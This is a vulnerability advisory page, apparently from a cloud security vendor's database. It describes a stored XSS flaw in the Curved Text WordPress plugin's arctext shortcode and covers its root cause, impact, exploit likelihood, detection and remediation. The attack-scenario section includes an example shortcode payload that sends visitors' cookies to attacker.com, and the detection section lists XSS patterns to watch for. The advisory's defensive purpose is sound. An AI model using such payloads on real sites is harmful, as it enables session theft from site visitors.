
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13854 is a Stored Cross-Site Scripting (XSS) vulnerability in the Curved Text plugin for WordPress, affecting all versions up to and including 0.1. The flaw exists in the radius parameter of the arctext shortcode due to insufficient input sanitization and output escaping. It was published on January 9, 2026, with Wordfence as the CNA. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium), assigned by Wordfence (Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerable code is located at line 32 of curved-text.php, where the radius parameter from the arctext shortcode is rendered without proper sanitization or escaping (WordPress Plugin Trac). Exploitation requires an authenticated attacker with at least Contributor-level access, who can embed a malicious shortcode containing arbitrary JavaScript into a post or page. The injected script executes in the context of any user who subsequently views the affected page, with the scope marked as Changed due to cross-context script execution (Wordfence).
Successful exploitation allows an authenticated attacker with Contributor-level privileges to persistently inject malicious JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors. This can lead to session cookie theft, credential harvesting, defacement, or redirection of users to malicious sites. Confidentiality and integrity are both impacted at a low level per the CVSS scoring, with no direct availability impact; however, the changed scope means the attack can affect users beyond the attacker's own session (Wordfence).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for Contributor-level authentication, limiting the attacker pool to registered users of the target WordPress site (Wordfence).
arctext shortcode with a crafted radius parameter containing a JavaScript payload, e.g., [arctext radius="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].radius value is rendered into the HTML, causing the injected script to execute in their browser, potentially stealing session cookies or performing actions on their behalf (Wordfence, WordPress Plugin Trac).wp-admin/post.php or the REST API containing arctext shortcode with suspicious radius values including <script>, javascript:, or encoded variants (e.g., %3Cscript%3E).wp_posts table entries containing [arctext radius="<script> or similar XSS payloads in post content.arctext shortcode, potentially carrying cookie or session data in query parameters.curved-text.php or other plugin files if an attacker escalated access after initial XSS exploitation.Site administrators should update the Curved Text plugin to a version beyond 0.1 that includes proper input sanitization and output escaping for the radius parameter. If no patched version is available, the plugin should be deactivated and removed until a fix is released. As an interim measure, restrict Contributor-level user registrations or audit existing Contributor accounts to reduce the risk of exploitation. Wordfence users with the premium firewall may have additional protection via virtual patching (Wordfence).
Wordfence included CVE-2025-13854 in their weekly WordPress vulnerability report for January 5–11, 2026, as part of routine disclosure coverage (Wordfence Blog). The vulnerability received limited broader media attention, consistent with its medium severity and niche plugin scope. No notable independent researcher commentary or significant social media discussion beyond automated CVE tracking accounts was observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."